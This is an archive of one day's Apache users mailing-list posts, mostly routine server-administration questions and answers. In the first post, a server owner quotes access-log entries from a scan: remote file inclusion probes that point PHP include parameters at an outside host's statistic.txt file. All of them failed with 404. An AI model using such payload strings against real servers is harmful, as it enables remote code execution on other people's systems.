[EMAIL PROTECTED] Colonela WebSecure2791 in agent_log

2007-04-03 Thread Sean Malloy

Hello,

I am new to Apache and am running version 1.3.29 on OpenBSD. Recently
crackers and script kiddies have been scanning my server. I don't
think any one has broken in yet. On April 2nd I noticed some
interesting entries in my access_log, error_log, and agent_log. For
exmaple:

A small part of access_log:

70.84.195.34 - - [02/Apr/2007:20:51:21 -0500] "GET
/cnl_prod/pmb/opac_css/includes/resa_func.inc.php?class_path=http://210.18.229.21/statistic
.txt?&/ HTTP/1.1" 404 254
70.84.195.34 - - [02/Apr/2007:20:51:21 -0500] "GET
/pmb/opac_css/includes/resa_func.inc.php?class_path=http://210.18.229.21/statistic.txt?&/
H
TTP/1.1" 404 245
70.84.195.34 - - [02/Apr/2007:20:51:21 -0500] "GET
/opac_css/includes/resa_func.inc.php?class_path=http://210.18.229.21/statistic.txt?&/
HTTP/
1.1" 404 241
70.84.195.34 - - [02/Apr/2007:20:51:21 -0500] "GET
/limbo/classes/adodbt/sql.php?classes_dir=http://210.18.229.21/statistic.txt?&/
HTTP/1.1" 4
04 234
70.84.195.34 - - [02/Apr/2007:20:51:22 -0500] "GET
/eqdkp/includes/dbal.php?eqdkp_root_path=http://210.18.229.21/statistic.txt?&/
HTTP/1.1" 40
4 229
70.84.195.34 - - [02/Apr/2007:20:51:22 -0500] "GET
/includes/db_adodb.php?baseDir=http://210.18.229.21/statistic.txt?&/
HTTP/1.1" 404 227

The person from 70.84.195.34 attempted to get 142 different
non-existent documents from my server. All the attempts resulted in
error code 404.

All the entries in the agent_log for 70.84.195.34 look like this:

Colonela WebSecure2791

I Googled it and found nothing. So here's my question. What is
"Colonela WebSecure2791"?

Thanks in advance for your feedback.
--
Sean Malloy
Registered GNU/Linux User #417855
Happy Hacking! ;-)

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



RE: [EMAIL PROTECTED] ssl VirtualHost in 1.3.*

2007-04-03 Thread Boyle Owen
> -Original Message-
> From: kalin mintchev [mailto:[EMAIL PROTECTED] 
> Sent: Tuesday, April 03, 2007 7:36 AM
> To: users@httpd.apache.org
> Subject: [EMAIL PROTECTED] ssl VirtualHost in 1.3.*
> 
> hi all..
> 
> wondering if i can use more than one ssl VirtualHost in 
> httpd.conf for a
> 1.3.33.
> i have one 'real' signed certificate and one self-signed - 
> for testing.

> 
> i set up a second VirtualHost under the  context but
> apparently the ssl engine always authenticates against the cert in the
> first VirtualHost.

I assume these are name-based virtual hosts?

See http://httpd.apache.org/docs/2.2/ssl/ssl_faq.html#vhosts2 (it's from
2.2 docs but it applies to all webservers).

> i tested with switching the positions of the VirtualHost and no matter
> which domain from the ones under the ssl i request i always 
> get the first
> certificate - either the signed or the self-signed one...
> 
> so is it possible to have two or more VirtualHosts under 
> IfDefine SSL ad

No - it's not possible.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored. 

> if so  what can i be possibly doing wrong?
> 
> thanks.
> 
> 
> -
> The official User-To-User support forum of the Apache HTTP 
> Server Project.
> See http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: [EMAIL PROTECTED]
>"   from the digest: [EMAIL PROTECTED]
> For additional commands, e-mail: [EMAIL PROTECTED]
>
 
 
This message is for the named person's use only. It may contain confidential, 
proprietary or legally privileged information. No confidentiality or privilege 
is waived or lost by any mistransmission. If you receive this message in error, 
please notify the sender urgently and then immediately delete the message and 
any copies of it from your system. Please also immediately destroy any 
hardcopies of the message. You must not, directly or indirectly, use, disclose, 
distribute, print, or copy any part of this message if you are not the intended 
recipient. The sender's company reserves the right to monitor all e-mail 
communications through their networks. Any views expressed in this message are 
those of the individual sender, except where the message states otherwise and 
the sender is authorised to state them to be the views of the sender's company.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



[EMAIL PROTECTED] Apache Crashing

2007-04-03 Thread Arnab Ganguly

Hi,
I was using the command line tool present under the /httpd-2.2.3/support/ab
I ran from the command prompt ./ab -n 5000 -c 130 -v 50
http://localhost/index.html.ie 5000 total request and 130 concurrently.

Apache version used is Apache 2.2 with Worker as MPM and OS as sun 5.9.
The error I got in the Apache error_log is in below


Tue Apr 03 03:34:51 2007] [error] [client 127.0.0.1] (24)Too many open
files:

file permissions deny server access: /usr/local/apache2/htdocs/index.html
[Tue Apr 03 03:34:51 2007] [error] (24)Too many open files:
apr_socket_accept:
(client socket)
[Tue Apr 03 03:34:53 2007] [alert] No active workers found... Apache is
exiting!

And from the command prompt where I ran the tool gave me the following
output
apr_socket_recv: Connection reset by peer (131)
Total of 1607 requests completed

The configuration I was following


ServerLimit 2
StartServers 1
ThreadLimit 200
MaxClients  200
MinSpareThreads 5
MaxSpareThreads 200
ThreadsPerChild 200
MaxRequestsPerChild 0



Help me as why this error is coming.Is there something silly I am doing.
Looking forward for your response.
Thanks in advance
-A


[EMAIL PROTECTED] Modules that are part of Apache standard distribution

2007-04-03 Thread Arsen Hayrapetyan

Hello,

Is it possible to list all the modules, which came with my Apache 
(server version:Apache/2.0.55) and which can be enabled? I can see the 
compilation options with 'apachectl -V', is there something similar to 
this? (In particular I am interested in mod_ssl and mod_rewrite modules, 
I would like to turn them on without re-compiling the source distribution).


Thanks in advance,
Arsen.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



[EMAIL PROTECTED] Re: apache on PDA

2007-04-03 Thread Maxim
Evan Platt wrote:
> At 08:42 PM 4/2/2007, mr_evil10 wrote:
> 
>> i have prob here..
>>
>> how to install apache (i use appserv) on PDA (HP iPAQ hx2000 series)??..
>> n where can i found free emulator...
> 
> Why would you need to install Apache on your PDA?
> 
>> my story..
>> i have build web site using Joomla content management..
>> but user only can access HOME at my page when they access with their PDA
>> thru wireless..
>>
>> the prob they cannot access other function like CONTACT US,SEARCH etc..
>>
>> for example,when user want to choose CONTACT US..
>> the PDA will display
>> "Cannot Connect - In order to connect to your work network you
>> will need
>> to configure a VPN connection"
>>
>> Is that my PDA prob or my connection prob that do not have apache??...
>> can anyone help me!!
> 
> It's a PDA issue, and has nothing to do with Apache.
> 
> -
> The official User-To-User support forum of the Apache HTTP Server Project.
> See http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: [EMAIL PROTECTED]
>   "   from the digest: [EMAIL PROTECTED]
> For additional commands, e-mail: [EMAIL PROTECTED]
> 
> 
Try Apache mobile.
http://www.blackdot.be/?inc=apache/mobile


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



Re: [EMAIL PROTECTED] Parsing problem in the encoded Url

2007-04-03 Thread Joshua Slive

On 4/3/07, Alaka Pathy -X (apathy - HCL at Cisco) <[EMAIL PROTECTED]> wrote:

Thanks Joshua. So you mean to say, when we encode, we should not encode
"?" character in the url.


Right. (Unless you intend it to be a part of the path, rather than the
query-string separator.)

Joshua.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



Re: [EMAIL PROTECTED] Modules that are part of Apache standard distribution

2007-04-03 Thread Joshua Slive

On 4/3/07, Arsen Hayrapetyan <[EMAIL PROTECTED]> wrote:

Hello,

Is it possible to list all the modules, which came with my Apache
(server version:Apache/2.0.55) and which can be enabled? I can see the
compilation options with 'apachectl -V', is there something similar to
this? (In particular I am interested in mod_ssl and mod_rewrite modules,
I would like to turn them on without re-compiling the source distribution).


Look in the modules/ directory (or wherever the LoadModule lines in
httpd.conf point).

Joshua.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



Re: [EMAIL PROTECTED] relative links get broken when adding vhost

2007-04-03 Thread Joshua Slive

On 4/2/07, Dan McDonald <[EMAIL PROTECTED]> wrote:


Now there's problems.
biofrogs.domain.edu/style/style.css and
www.domain.edu/style/style.css are pointing to
completely different files. ../../../images/icon.jpg
wouldnt even be accessible on the subdomain unless you
use a absolute link etc etc. Because the DocumentRoot
changed obviously all these relative links are broken.


Is there a way to fix this other than writing the
html, or making symlinks in the new DocRoot? I really
wanted mod_rewrite to match a "../../file" request,
but it just matches the file it points to.

Any ideas would be great!


Apache never sees a request for a "../../file", because relative links
are resolved at the client before a request is made.

mod_proxy_html or mod_line_edit could probably be configured to do
live fix-ups on the html pages, at the expense of some additional
complexity. But a better idea is just to fix your html.

Joshua.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



[EMAIL PROTECTED] how can i filter fromout a list

2007-04-03 Thread herauthon
Dear Enlisted Ones.

I would be pleased if i could exclude 
visitors because they have no return dns.
my very smart idea was to list allthose
without and make this a rule set for
exclusion - but i am sure there is 
yet smarter way..

enlighten me please..
show me the way

one apprentice alchemist 


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



[EMAIL PROTECTED] 2.2.4 installer for windows doesn't detect blank domain/server/email entries

2007-04-03 Thread Seak, Teng-Fong
With 2.2.4 installer for windows
(apache_2.2.4-win32-x86-no_ssl.msi), blank domain name/web server
name/email entries aren't detected and the installer just lets them go. 
This will lead to unsuccessful installation of Apache.

With 2.0.59 installer, we don't have this problem.  If someone
responsible of the installer is in this mailing-list, please reply.  Or
I'll file a bug next Monday.




--
* Zoner PhotoStudio 8 - Your Photos perfect, shared, organised! 
www.zoner.com/zps
  You can download your free version.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



[EMAIL PROTECTED] Running two apaches on different ports

2007-04-03 Thread Anthony Smith
I thought this would be easy, but I must be doing something wrong.

 

My first install went like this:

./configure --prefix=/usr/local/apache-2.0.59/ --enable-so --enable-dav 

 

It works fine. And it runs on port 80.

 

For the the next install I tried:

 

./configure --prefix=/usr/local/apache2-svn/ --enable-so --enable-dav 

I went in the httpd.conf file and changed it to port 7770. But when I go
to the bin directrory to start apache it says it is already started. So
I stopped it and restarted it. It seems to still stop and start the
first instance that runs on port 80. I am in the right directory and my
port number in the httpd.conf is changed.

 

Is there anything else I could be doing wrong?

 

 

 

BEGIN:VCARD
VERSION:2.1
N:Smith;Anthony
FN:Anthony Smith
ORG:FedEx Services;International Technologies
TITLE:Programmer Analyst
TEL;WORK;VOICE:901-263-8953
TEL;CELL;VOICE:901-216-7234
ADR;WORK:;;20 FedEx Pkwy;Collierville;TN;38017
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:20 FedEx Pkwy=0D=0ACollierville, TN 38017
EMAIL;PREF;INTERNET:[EMAIL PROTECTED]
REV:20060818T152807Z
END:VCARD
-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] Running two apaches on different ports

2007-04-03 Thread Joshua Slive

On 4/3/07, Anthony Smith <[EMAIL PROTECTED]> wrote:





I thought this would be easy, but I must be doing something wrong.



My first install went like this:

./configure --prefix=/usr/local/apache-2.0.59/ --enable-so --enable-dav



It works fine. And it runs on port 80.



For the the next install I tried:



./configure --prefix=/usr/local/apache2-svn/ --enable-so
--enable-dav

I went in the httpd.conf file and changed it to port 7770. But when I go to
the bin directrory to start apache it says it is already started. So I
stopped it and restarted it. It seems to still stop and start the first
instance that runs on port 80. I am in the right directory and my port
number in the httpd.conf is changed.



Is there anything else I could be doing wrong?


You probably need at least a "make clean" in between the two
configure's. Safer would be to rm -rf the compile directory and
re-extract the tarball.

You can still save the installs if you want. You just need to edit
apachectl and httpd.conf to point to all the correct paths.

Joshua.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



Re: [EMAIL PROTECTED] how can i filter fromout a list

2007-04-03 Thread Joshua Slive

On 4/3/07, herauthon <[EMAIL PROTECTED]> wrote:

Dear Enlisted Ones.

I would be pleased if i could exclude
visitors because they have no return dns.
my very smart idea was to list allthose
without and make this a rule set for
exclusion - but i am sure there is
yet smarter way..

enlighten me please..
show me the way


This is a silly (if I weren't so polite, I'd say "stupid") idea. It
will slow your server and won't increase security in any noticeable
way. But if you insist,

HostNameLookups On
SetEnvIf Remote_Host ^[0-9.]+$ noname

Order deny,allow
Deny from env=noname


Joshua.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



[EMAIL PROTECTED] Running JS in Apache

2007-04-03 Thread Alejandro Decchi

I would like to apache executes javascript.
Already I have it installed with php, mysql and this one working. Why
apache  does not execute javascript javascript I wait could give me a hand
regards
thz


Re: [EMAIL PROTECTED] Running JS in Apache

2007-04-03 Thread Joshua Slive

On 4/3/07, Alejandro Decchi <[EMAIL PROTECTED]> wrote:

I would like to apache executes javascript.
Already I have it installed with php, mysql and this one working. Why apache
 does not execute javascript javascript I wait could give me a hand regards
thz


In most cases, javascript is executed by the client, not the server.
So perhaps you need to look at what your javascript is missing to get
the client to execute it.

If you are really looking for server-side javascript, then you need a
plugin/module to get apache to run it. PHP certainly doesn't use
javascript directly. Some ideas are here:
http://en.wikipedia.org/wiki/Server-side_JavaScript

Joshua.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



RE: [EMAIL PROTECTED] Running two apaches on different ports

2007-04-03 Thread Anthony Smith
That solved my problem. Thanks!

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Joshua
Slive
Sent: Tuesday, April 03, 2007 10:24 AM
To: users@httpd.apache.org
Subject: Re: [EMAIL PROTECTED] Running two apaches on different ports

On 4/3/07, Anthony Smith <[EMAIL PROTECTED]> wrote:
>
>
>
>
> I thought this would be easy, but I must be doing something wrong.
>
>
>
> My first install went like this:
>
> ./configure --prefix=/usr/local/apache-2.0.59/ --enable-so
--enable-dav
>
>
>
> It works fine. And it runs on port 80.
>
>
>
> For the the next install I tried:
>
>
>
> ./configure --prefix=/usr/local/apache2-svn/ --enable-so
> --enable-dav
>
> I went in the httpd.conf file and changed it to port 7770. But when I
go to
> the bin directrory to start apache it says it is already started. So I
> stopped it and restarted it. It seems to still stop and start the
first
> instance that runs on port 80. I am in the right directory and my port
> number in the httpd.conf is changed.
>
>
>
> Is there anything else I could be doing wrong?

You probably need at least a "make clean" in between the two
configure's. Safer would be to rm -rf the compile directory and
re-extract the tarball.

You can still save the installs if you want. You just need to edit
apachectl and httpd.conf to point to all the correct paths.

Joshua.

-
The official User-To-User support forum of the Apache HTTP Server
Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



Re: [EMAIL PROTECTED] Running two apaches on different ports

2007-04-03 Thread Arnab Ganguly

You can try out the multiple instance also with the same Apache
binary.Butdiff config
files.While starting use the ./httpd -k start -f path and location of the
new configuration file.
Thanks
-A

On 4/3/07, Anthony Smith <[EMAIL PROTECTED]> wrote:


 I thought this would be easy, but I must be doing something wrong.



My first install went like this:

./configure --prefix=/usr/local/apache-2.0.59/ --enable-so --enable-dav



It works fine. And it runs on port 80.



For the the next install I tried:



./configure --prefix=/usr/local/apache2-svn/ --enable-so --enable-dav

I went in the httpd.conf file and changed it to port 7770. But when I go
to the bin directrory to start apache it says it is already started. So I
stopped it and restarted it. It seems to still stop and start the first
instance that runs on port 80. I am in the right directory and my port
number in the httpd.conf is changed.



Is there anything else I could be doing wrong?







-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]




Re: [EMAIL PROTECTED] Running JS in Apache

2007-04-03 Thread Robin-David Hammond


Java-script now ecma-script was written as a client-side complement to 
java which is an unrelated (in many ways, insert objections to /dev/null) 
server technology. Are you sure you dont want to execute java?



Robin-David Hammond  KB3IEN
50 West 17th Street
Ninth Floor
New York, NY 10011
+1 212 479.1700 x 1729


On Tue, 3 Apr 2007, Joshua Slive wrote:


On 4/3/07, Alejandro Decchi <[EMAIL PROTECTED]> wrote:

I would like to apache executes javascript.
Already I have it installed with php, mysql and this one working. Why 
apache

 does not execute javascript javascript I wait could give me a hand regards
thz


In most cases, javascript is executed by the client, not the server.
So perhaps you need to look at what your javascript is missing to get
the client to execute it.

If you are really looking for server-side javascript, then you need a
plugin/module to get apache to run it. PHP certainly doesn't use
javascript directly. Some ideas are here:
http://en.wikipedia.org/wiki/Server-side_JavaScript

Joshua.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
 "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]




-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



Re: [EMAIL PROTECTED] Running JS in Apache

2007-04-03 Thread Alejandro Decchi

I have a apache server with php , glib, libxml2, Rlib .The aplication is
writen in PHP and the login is write in javascript(JS).Whe i browse de
index.php i can not see the login windows , i supose it is because i have
not install something about javascript because in the other server where the
aplication is running it is running ok.
Can sonmeone give me a help ?


On 4/3/07, Joshua Slive <[EMAIL PROTECTED]> wrote:


On 4/3/07, Alejandro Decchi <[EMAIL PROTECTED]> wrote:
> I would like to apache executes javascript.
> Already I have it installed with php, mysql and this one working. Why
apache
>  does not execute javascript javascript I wait could give me a hand
regards
> thz

In most cases, javascript is executed by the client, not the server.
So perhaps you need to look at what your javascript is missing to get
the client to execute it.

If you are really looking for server-side javascript, then you need a
plugin/module to get apache to run it. PHP certainly doesn't use
javascript directly. Some ideas are here:
http://en.wikipedia.org/wiki/Server-side_JavaScript

Joshua.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]




Re: [EMAIL PROTECTED] Running JS in Apache

2007-04-03 Thread Joshua Slive

On 4/3/07, Alejandro Decchi <[EMAIL PROTECTED]> wrote:

I have a apache server with php , glib, libxml2, Rlib .The aplication is
writen in PHP and the login is write in javascript(JS).Whe i browse de
index.php i can not see the login windows , i supose it is because i have
not install something about javascript because in the other server where the
aplication is running it is running ok.
Can sonmeone give me a help ?


So the browser is failing to execute the javascript. In general, the
server could influence this in only two ways that I can imagine: 1) an
included javascript file doesn't exist in the correct place on the
server or is otherwise failing to be delivered -- check your apache
error log; or 2) the mime-type on an included javascript file isn't
set correctly -- see the AddType directive.

As general advice:
1) This isn't a good place to get help with primarily client-side
technologies like javascript. You should look for a more appropriate
forum.
2) Having a login form that doesn't work at all with javascript
disabled is probably a bad idea.

Joshua.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



Re: [EMAIL PROTECTED] Running JS in Apache

2007-04-03 Thread Alejandro Decchi

Hello Joshua.
I do not think that does not exist the javascript in the correct place,
because I copy the web aplication from the web server where the aplication
is runing ok
Need i install javascript in apache ? How can i do it ?
I am newbie


On 4/3/07, Joshua Slive <[EMAIL PROTECTED]> wrote:


On 4/3/07, Alejandro Decchi <[EMAIL PROTECTED]> wrote:
> I have a apache server with php , glib, libxml2, Rlib .The aplication is
> writen in PHP and the login is write in javascript(JS).Whe i browse de
> index.php i can not see the login windows , i supose it is because i
have
> not install something about javascript because in the other server where
the
> aplication is running it is running ok.
> Can sonmeone give me a help ?

So the browser is failing to execute the javascript. In general, the
server could influence this in only two ways that I can imagine: 1) an
included javascript file doesn't exist in the correct place on the
server or is otherwise failing to be delivered -- check your apache
error log; or 2) the mime-type on an included javascript file isn't
set correctly -- see the AddType directive.

As general advice:
1) This isn't a good place to get help with primarily client-side
technologies like javascript. You should look for a more appropriate
forum.
2) Having a login form that doesn't work at all with javascript
disabled is probably a bad idea.

Joshua.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]




Re: [EMAIL PROTECTED] Running JS in Apache

2007-04-03 Thread Joshua Slive

On 4/3/07, Alejandro Decchi <[EMAIL PROTECTED]> wrote:

Hello Joshua.
I do not think that does not exist the javascript in the correct place,
because I copy the web aplication from the web server where the aplication
is runing ok
Need i install javascript in apache ? How can i do it ?
I am newbie


Sorry, but I can only repeat the advice that I've already given you:

- Javascript has almost nothing to do with the web server. It is the
client that executes it.
- Since you need help with a client-side technology, you are asking in
the wrong forum. You need to find somebody willing to take a look at
your code and figure out why it isn't executing. I suggest starting by
asking the people who supplied you with the javascript code in the
first place.

Joshua.




On 4/3/07, Joshua Slive <[EMAIL PROTECTED]> wrote:
>
> On 4/3/07, Alejandro Decchi <[EMAIL PROTECTED]> wrote:
> > I have a apache server with php , glib, libxml2, Rlib .The aplication is
> > writen in PHP and the login is write in javascript(JS).Whe i browse de
> > index.php i can not see the login windows , i supose it is because i
have
> > not install something about javascript because in the other server where
the
> > aplication is running it is running ok.
> > Can sonmeone give me a help ?
>
> So the browser is failing to execute the javascript. In general, the
> server could influence this in only two ways that I can imagine: 1) an
> included javascript file doesn't exist in the correct place on the
> server or is otherwise failing to be delivered -- check your apache
> error log; or 2) the mime-type on an included javascript file isn't
> set correctly -- see the AddType directive.
>
> As general advice:
> 1) This isn't a good place to get help with primarily client-side
> technologies like javascript. You should look for a more appropriate
> forum.
> 2) Having a login form that doesn't work at all with javascript
> disabled is probably a bad idea.
>
> Joshua.
>
>
-
> The official User-To-User support forum of the Apache HTTP Server Project.
> See http://httpd.apache.org/userslist.html> for more
info.
> To unsubscribe, e-mail:
[EMAIL PROTECTED]
>   "   from the digest:
[EMAIL PROTECTED]
> For additional commands, e-mail: [EMAIL PROTECTED]
>
>




-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



[EMAIL PROTECTED] Re: Running JS in Apache

2007-04-03 Thread paul
Alejandro Decchi schrieb:
> Hello Joshua.
> I do not think that does not exist the javascript in the correct place,
> because I copy the web aplication from the web server where the aplication
> is runing ok
1. Don't top post
2. Are you sure your index.php is executed correctly?
3. How is the login-form supposed to be generated (static html, php,
javascript)
4. What do you see if you right-click the login page and choose "view
page source"?
5. If that's all greek to you, you have a lot to read about.
> Need i install javascript in apache ? 
Most likely not.

How can i do it ?
google for rhino and javascript

> I am newbie
Oh, really ;=)

cheers
 Paul


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



[EMAIL PROTECTED] Re: apache2 with modules ldap

2007-04-03 Thread paul
Karunakar Reddy G schrieb:
> Hi ,
> 
> I am new to the list ,
> 
> I successfully compiled and installed *apr* and *aprutil *source code  with
> following configure options
Which versions? Have you checked your apr/aprutil versions meet the
requirements for apache-2.2.4?

cheers
 Paul


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



[EMAIL PROTECTED] apache2 with modules ldap

2007-04-03 Thread Karunakar Reddy G

Hi ,

I am new to the list ,

I successfully compiled and installed *apr* and *aprutil *source code  with
following configure options


./configure --prefix=/usr/local/apr-httpd

./configure --prefix=/usr/local/apr-util-httpd
--with-apr=/usr/local/apr-httpd --enable-ssl=shared --enable-ssl
--with-ssl=/usr/local/ssl --with-ldap --with-ldap-lib=/usr/lib

But when I compile *apache2.2.4* source code, I get following errors

./configure --prefix=/usr/local/apache2 --with-apr=/usr/local/apr-httpd
--with-apr-util=/usr/local/apr-util-httpd --enable-mods-shared=all
--enable-ssl=shared --enable-ssl --with-ssl=/usr/local/ssl --enable-proxy
--enable-proxy-connect --enable-proxy-ftp --enable-ldap --enable-authnz-ldap

.

-ldl
Undefined   first referenced
symbol in file
ldap_start_tls_s
/usr/local/apr-util-httpd/lib/libaprutil-1.so
ld: fatal: Symbol referencing errors. No output written to httpd
collect2: ld returned 1 exit status
*** Error code 1
make: Fatal error: Command failed for target `httpd'
Current working directory /xdds/xsiinst/httpd-2.2.4
*** Error code 1
make: Fatal error: Command failed for target `all-recursive'

I tried all the ways but I couldn't succeed , can anybody in the list help
me about above *ldap_start_tls_s* undefined symbol issues

Thanks
Karunakar


Re: [EMAIL PROTECTED] Re: apache2 with modules ldap

2007-04-03 Thread Karunakar Reddy G

I used source code for *apr* and *aprutil*

apr-1.2.8.tar.gz
apr-util-1.2.8.tar.gz

Thanks
Karunakar


On 4/3/07, paul <[EMAIL PROTECTED]> wrote:


Karunakar Reddy G schrieb:
> Hi ,
>
> I am new to the list ,
>
> I successfully compiled and installed *apr* and *aprutil *source
code  with
> following configure options
Which versions? Have you checked your apr/aprutil versions meet the
requirements for apache-2.2.4?

cheers
Paul


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]




[EMAIL PROTECTED] Meta tags: keywords and description

2007-04-03 Thread Curtis Vaughan
It is my understanding that the metatag "Keywords" is not really used by
search engine crawlers any more, and that description is the better to
use. Could someone confirm that?

Also, I wondering about the syntax for these. For example, I am looking at
the description for a law firm. It has:

"General business law, commercial transactions, real estate, contracts,
new entity formation.  Wills, trusts & estate planning.  Immigration:
Employer Petitions, Business Immigration, Family Petitions, Permanent
Residency & Naturalizations."

In the first place I thought periods were not really used. Also, it was my
understand that you should keep it simple. This description seems rather
complicated. Not to mention misspellings.

Thanks for any input!


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



Re: [EMAIL PROTECTED] Meta tags: keywords and description

2007-04-03 Thread Joshua Slive

On 4/3/07, Curtis Vaughan <[EMAIL PROTECTED]> wrote:

It is my understanding that the metatag "Keywords" is not really used by
search engine crawlers any more, and that description is the better to
use. Could someone confirm that?

Also, I wondering about the syntax for these. For example, I am looking at
the description for a law firm. It has:

"General business law, commercial transactions, real estate, contracts,
new entity formation.  Wills, trusts & estate planning.  Immigration:
Employer Petitions, Business Immigration, Family Petitions, Permanent
Residency & Naturalizations."

In the first place I thought periods were not really used. Also, it was my
understand that you should keep it simple. This description seems rather
complicated. Not to mention misspellings.

Thanks for any input!


Hmmm, again, this seems way off-topic for this forum. What you want is
a forum on "search engine optimization" -- there are lots of them.

(But as general advice, don't worry so much about those kinds of
details. Modern search engines are smart enough to figure out what
your site is about if you construct a site with lots of good content
and get it linked from other relevant sites.)

Joshua.
